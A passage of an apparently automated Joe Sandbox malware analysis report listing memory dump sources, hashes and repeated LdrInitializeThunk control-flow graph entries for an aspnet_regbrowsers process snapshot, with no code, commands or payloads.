                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 13 9f0048-9f005d LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                                                        • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                                                        • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 14 9f0078-9f0090 LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                                                        • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                                                        • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 1 9ef9f0-9efa05 LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 0 9ef900-9ef918 LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 2 9efad0-9efae5 LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 3 9efae8-9efafd LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 5 9efbb8-9efbcd LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 4 9efb68-9efb7d LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 7 9efc90-9efca5 LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                                                        • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                                                        • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 6 9efc60-9efc75 LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 8 9efd8c-9efda4 LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 9 9efdc0-9efdd5 LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 10 9efea0-9efeb5 LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                                                        • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 11 9efed0-9efee5 LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
